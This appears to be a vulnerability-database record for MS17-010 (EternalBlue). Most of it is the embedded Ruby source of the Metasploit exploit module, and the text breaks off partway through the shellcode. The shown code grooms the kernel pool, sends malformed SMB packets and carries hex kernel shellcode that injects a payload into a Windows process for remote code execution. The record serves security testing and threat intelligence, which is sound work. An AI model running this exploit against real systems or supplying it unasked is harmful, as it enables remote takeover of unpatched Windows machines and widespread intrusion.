a reboot. This may be more likely with some payloads.", "enchantments": {"dependencies": {"modified": "2018-11-24T14:34:23", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1", "SECURELIST:CE501995262A06F4E132DE2F9C2B9B6C"], "type": "securelist"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142602", "PACKETSTORM:142548", "PACKETSTORM:142603"], "type": "packetstorm"}, {"idList": ["EDB-ID:41987", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["AVLEONOV:A5219F45CF78A7D911A6EBBE8F9D49B2", "AVLEONOV:C8B855FEC3E31BC28C624FF0B19272B7"], "type": "avleonov"}, {"idList": ["FIREEYE:399092589F455855881447C60B56C21A"], "type": "fireeye"}, {"idList": ["THN:EA407B51944632C248FEB495594123EA", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-27803", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:9EF85E0CE1D118D27911357B1C516074", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "01b8b6ef489d19391021d58437d9bee8", "history": [], "href": "", "id": "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "lastseen": "2018-11-24T14:34:23", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/smb/ms17_010_eternalblue.rb", "metasploitReliability": "Average", "modified": "2018-11-05T23:16:16", "objectVersion": "1.4", "published": "2017-05-30T15:55:28", "references": [], "reporter": "Rapid7", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'ruby_smb'\nrequire 'ruby_smb/smb1/packet'\nrequire 'windows_error'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::DCERPC\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption',\n 'Description' => %q(\n This module is a port of the Equation Group ETERNALBLUE exploit, part of\n the FuzzBunch toolkit released by Shadow Brokers.\n\n There is a buffer overflow memmove operation in Srv!SrvOs2FeaToNt. The size\n is calculated in Srv!SrvOs2FeaListSizeToNt, with mathematical error where a\n DWORD is subtracted into a WORD. The kernel pool is groomed so that overflow\n is well laid-out to overwrite an SMBv1 buffer. Actual RIP hijack is later\n completed in srvnet!SrvNetWskReceiveComplete.\n\n This exploit, like the original may not trigger 100% of the time, and should be\n run continuously until triggered. It seems like the pool will get hot streaks\n and need a cool down period before the shells rain in again.\n\n The module will attempt to use Anonymous login, by default, to authenticate to perform the\n exploit. If the user supplies credentials in the SMBUser, SMBPass, and SMBDomain options it will use\n those instead.\n\n On some systems, this module may cause system instability and crashes, such as a BSOD or\n a reboot. This may be more likely with some payloads.\n ),\n\n 'Author' =>\n [\n 'Sean Dillon <sean.dillon@risksense.com>', # @zerosum0x0\n 'Dylan Davis <dylan.davis@risksense.com>', # @jennamagius\n 'Equation Group',\n 'Shadow Brokers',\n 'thelightcosine' # RubySMB refactor and Fallback Credential mode\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://github.com/RiskSense-Ops/MS17-010']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => 5\n },\n 'Privileged' => true,\n 'Payload' =>\n {\n 'Space' => 2000, # this can be more, needs to be recalculated\n 'EncoderType' => Msf::Encoder::Type::Raw\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [\n 'Windows 7 and Server 2008 R2 (x64) All Service Packs',\n {\n 'Platform' => 'win',\n 'Arch' => [ARCH_X64],\n 'os_patterns' => ['Server 2008 R2', 'Windows 7', 'Windows Embedded Standard 7'],\n 'ep_thl_b' => 0x308, # EPROCESS.ThreadListHead.Blink offset\n 'et_alertable' => 0x4c, # ETHREAD.Alertable offset\n 'teb_acp' => 0x2c8, # TEB.ActivationContextPointer offset\n 'et_tle' => 0x420 # ETHREAD.ThreadListEntry offset\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Mar 14 2017',\n 'Notes' =>\n {\n 'AKA' => ['ETERNALBLUE']\n }\n ))\n\n register_options(\n [\n Opt::RPORT(445),\n OptBool.new('VERIFY_TARGET', [true, \"Check if remote OS matches exploit Target.\", true]),\n OptBool.new('VERIFY_ARCH', [true, \"Check if remote architecture matches exploit Target.\", true]),\n OptString.new('SMBUser', [false, '(Optional) The username to authenticate as', '']),\n OptString.new('SMBPass', [false, '(Optional) The password for the specified username', '']),\n OptString.new('SMBDomain', [false, '(Optional) The Windows domain to use for authentication', '.'])\n ]\n )\n register_advanced_options(\n [\n OptString.new('ProcessName', [true, 'Process to inject payload into.', 'spoolsv.exe']),\n OptInt.new('MaxExploitAttempts', [true, \"The number of times to retry the exploit.\", 3]),\n OptInt.new('GroomAllocations', [true, \"Initial number of times to groom the kernel pool.\", 12]),\n OptInt.new('GroomDelta', [true, \"The amount to increase the groom count by per try.\", 5])\n ]\n )\n\n end\n\n class EternalBlueError < StandardError\n end\n\n # todo: create MS17-010 mixin, and hook up auxiliary/scanner/smb/smb_ms17_010\n\n def exploit\n begin\n for i in 1..datastore['MaxExploitAttempts']\n grooms = datastore['GroomAllocations'] + datastore['GroomDelta'] * (i - 1)\n smb_eternalblue(datastore['ProcessName'], grooms)\n\n # we don't need this sleep, and need to find a way to remove it\n # problem is session_count won't increment until stage is complete :\\\n secs = 0\n while !session_created? and secs < 30\n secs += 1\n sleep 1\n end\n\n if session_created?\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_good(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n break\n else\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n print_bad(\"=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\")\n end\n end\n\n rescue EternalBlueError => e\n print_error(\"#{e.message}\")\n return false\n rescue ::RubySMB::Error::NegotiationFailure\n print_error(\"SMB Negotiation Failure -- this often occurs when lsass crashes. The target may reboot in 60 seconds.\")\n return false\n rescue ::RubySMB::Error::UnexpectedStatusCode,\n ::Errno::ECONNRESET,\n ::Rex::HostUnreachable,\n ::Rex::ConnectionTimeout,\n ::Rex::ConnectionRefused,\n ::RubySMB::Error::CommunicationError => e\n print_error(\"#{e.class}: #{e.message}\")\n report_failure\n return false\n rescue => error\n print_error(error.class.to_s)\n print_error(error.message)\n print_error(error.backtrace.join(\"\\n\"))\n return false\n ensure\n # pass\n end\n end\n\n def smb_eternalblue(process_name, grooms)\n begin\n # Step 0: pre-calculate what we can\n shellcode = make_kernel_user_payload(payload.encode, process_name, 0, 0, 0, 0)\n payload_hdr_pkt = make_smb2_payload_headers_packet\n payload_body_pkt = make_smb2_payload_body_packet(shellcode)\n\n # Step 1: Connect to IPC$ share\n print_status(\"Connecting to target for exploitation.\")\n client, tree, sock, os = smb1_anonymous_connect_ipc()\n rescue RubySMB::Error::CommunicationError\n # Error handler in case SMBv1 disabled on target\n raise EternalBlueError, 'Could not make SMBv1 connection'\n else\n print_good(\"Connection established for exploitation.\")\n\n if verify_target(os)\n print_good('Target OS selected valid for OS indicated by SMB reply')\n else\n print_warning('Target OS selected not valid for OS indicated by SMB reply')\n print_warning('Disable VerifyTarget option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Target.'\n end\n\n # cool buffer print no matter what, will be helpful when people post debug issues\n print_core_buffer(os)\n\n if verify_arch\n print_good('Target arch selected valid for arch indicated by DCE/RPC reply')\n else\n print_warning('Target arch selected not valid for arch indicated by DCE/RPC reply')\n print_warning('Disable VerifyArch option to proceed manually...')\n raise EternalBlueError, 'Unable to continue with improper OS Arch.'\n end\n\n print_status(\"Trying exploit with #{grooms} Groom Allocations.\")\n\n # Step 2: Create a large SMB1 buffer\n print_status(\"Sending all but last fragment of exploit packet\")\n smb1_large_buffer(client, tree, sock)\n\n # Step 3: Groom the pool with payload packets, and open/close SMB1 packets\n print_status(\"Starting non-paged pool grooming\")\n\n # initialize_groom_threads(ip, port, payload, grooms)\n fhs_sock = smb1_free_hole(true)\n\n @groom_socks = []\n\n print_good(\"Sending SMBv2 buffers\")\n smb2_grooms(grooms, payload_hdr_pkt)\n\n fhf_sock = smb1_free_hole(false)\n\n print_good(\"Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\")\n fhs_sock.shutdown()\n\n print_status(\"Sending final SMBv2 buffers.\") # 6x\n smb2_grooms(6, payload_hdr_pkt) # todo: magic #\n\n fhf_sock.shutdown()\n\n print_status(\"Sending last fragment of exploit packet!\")\n final_exploit_pkt = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_exploit, 15)\n sock.put(final_exploit_pkt)\n\n print_status(\"Receiving response from exploit packet\")\n code, raw = smb1_get_response(sock)\n\n code_str = \"0x\" + code.to_i.to_s(16).upcase\n if code.nil?\n print_error(\"Did not receive a response from exploit packet\")\n elsif code == 0xc000000d # STATUS_INVALID_PARAMETER (0xC000000D)\n print_good(\"ETERNALBLUE overwrite completed successfully (#{code_str})!\")\n else\n print_warning(\"ETERNALBLUE overwrite returned unexpected status code (#{code_str})!\")\n end\n\n # Step 4: Send the payload\n print_status(\"Sending egg to corrupted connection.\")\n\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt.first(2920)) }\n @groom_socks.each{ |gsock| gsock.put(payload_body_pkt[2920..(4204 - 0x84)]) }\n\n print_status(\"Triggering free of corrupted buffer.\")\n # tree disconnect\n # logoff and x\n # note: these aren't necessary, just close the sockets\n return true\n ensure\n abort_sockets\n end\n end\n\n def verify_target(os)\n os = os.gsub(\"\\x00\", '') # strip unicode bs\n os << \"\\x00\" # but original has a null\n ret = true\n\n if datastore['VerifyTarget']\n ret = false\n # search if its in patterns\n target['os_patterns'].each do |pattern|\n if os.downcase.include? pattern.downcase\n ret = true\n break\n end\n end\n end\n\n return ret\n end\n\n def verify_arch\n return true unless datastore['VerifyArch']\n\n # XXX: This sends a new DCE/RPC packet\n arch = dcerpc_getarch\n\n return true if arch && arch == target_arch.first\n\n print_warning(\"Target arch is #{target_arch.first}, but server returned #{arch.inspect}\")\n print_warning(\"The DCE/RPC service or probe may be blocked\") if arch.nil?\n false\n end\n\n def print_core_buffer(os)\n print_status(\"CORE raw buffer dump (#{os.length.to_s} bytes)\")\n\n count = 0\n chunks = os.scan(/.{1,16}/)\n chunks.each do | chunk |\n hexdump = chunk.chars.map { |ch| ch.ord.to_s(16).rjust(2, \"0\") }.join(\" \")\n\n format = \"0x%08x %-47s %-16s\" % [(count * 16), hexdump, chunk]\n print_status(format)\n count += 1\n end\n end\n\n '''\n #\n # Increase the default delay by five seconds since some kernel-mode\n # payloads may not run immediately.\n #\n def wfs_delay\n super + 5\n end\n '''\n\n def smb2_grooms(grooms, payload_hdr_pkt)\n grooms.times do |groom_id|\n gsock = connect(false)\n @groom_socks << gsock\n gsock.put(payload_hdr_pkt)\n end\n end\n\n def smb1_anonymous_connect_ipc\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)\n response_code = client.login\n\n unless response_code == ::WindowsError::NTStatus::STATUS_SUCCESS\n raise RubySMB::Error::UnexpectedStatusCode, \"Error with login: #{response_code.to_s}\"\n end\n os = client.peer_native_os\n\n tree = client.tree_connect(\"\\\\\\\\#{datastore['RHOST']}\\\\IPC$\")\n\n return client, tree, sock, os\n end\n\n def smb1_large_buffer(client, tree, sock)\n nt_trans_pkt = make_smb1_nt_trans_packet(tree.id, client.user_id)\n\n # send NT Trans\n vprint_status(\"Sending NT Trans Request packet\")\n\n client.send_recv(nt_trans_pkt)\n # Initial Trans2 request\n trans2_pkt_nulled = make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_zero, 0)\n\n # send all but last packet\n for i in 1..14\n trans2_pkt_nulled << make_smb1_trans2_exploit_packet(tree.id, client.user_id, :eb_trans2_buffer, i)\n end\n\n vprint_status(\"Sending malformed Trans2 packets\")\n sock.put(trans2_pkt_nulled)\n\n begin\n sock.get_once\n rescue EOFError\n vprint_error(\"No response back from SMB echo request. Continuing anyway...\")\n end\n\n client.echo(count:1, data: \"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x00\")\n end\n\n def smb1_free_hole(start)\n sock = connect(false)\n dispatcher = RubySMB::Dispatcher::Socket.new(sock)\n client = RubySMB::Client.new(dispatcher, smb1: true, smb2: false, username: smb_user, domain: smb_domain, password: smb_pass)\n client.negotiate\n\n pkt = \"\"\n\n if start\n vprint_status(\"Sending start free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\xc0\", \"\\x2d\\x01\", \"\\xf0\\xff\\x00\\x00\\x00\")\n else\n vprint_status(\"Sending end free hole packet.\")\n pkt = make_smb1_free_hole_session_packet(\"\\x07\\x40\", \"\\x2c\\x01\", \"\\xf8\\x87\\x00\\x00\\x00\")\n end\n\n client.send_recv(pkt)\n sock\n end\n\n def smb1_get_response(sock)\n raw = nil\n\n # dirty hack since it doesn't always like to reply the first time...\n 16.times do\n raw = sock.get_once\n break unless raw.nil? or raw.empty?\n end\n\n return nil unless raw\n response = RubySMB::SMB1::SMBHeader.read(raw[4..-1])\n code = response.nt_status\n return code, raw, response\n end\n\n def make_smb2_payload_headers_packet\n # don't need a library here, the packet is essentially nonsensical\n pkt = \"\"\n pkt << \"\\x00\" # session message\n pkt << \"\\x00\\xff\\xf7\" # size\n pkt << \"\\xfeSMB\" # SMB2\n pkt << \"\\x00\" * 124\n\n pkt\n end\n\n def make_smb2_payload_body_packet(kernel_user_payload)\n # precalculated lengths\n pkt_max_len = 4204\n pkt_setup_len = 497\n pkt_max_payload = pkt_max_len - pkt_setup_len # 3575\n\n # this packet holds padding, KI_USER_SHARED_DATA addresses, and shellcode\n pkt = \"\"\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet, tree_id, user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0,packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status(\"Making :eb_trans2_exploit packet\")\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status(\"Making :eb_trans2_zero packet\")\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status(\"Making :eb_trans2_buffer packet\")\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet, tree_id, user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + (\"\\x00\" * 973)\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, ep_thl_b, et_alertable, teb_acp, et_tle)\n sc = make_kernel_shellcode(proc_name)\n sc << [ring3.length].pack(\"S<\")\n sc << ring3\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n # \"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" +\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" +\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" +\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" +\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" +\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" +\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" +\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" +\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" +\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" +\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" +\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" +\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" +\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" +\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" +\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" +\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" +\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" +\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" +\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" +\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" +\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" +\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" +\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" +\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" +\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" +\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" +\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\" + generate_process_hash(proc_name.upcase) + \"\\x75\\xBC\\x49\" +\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" +\n 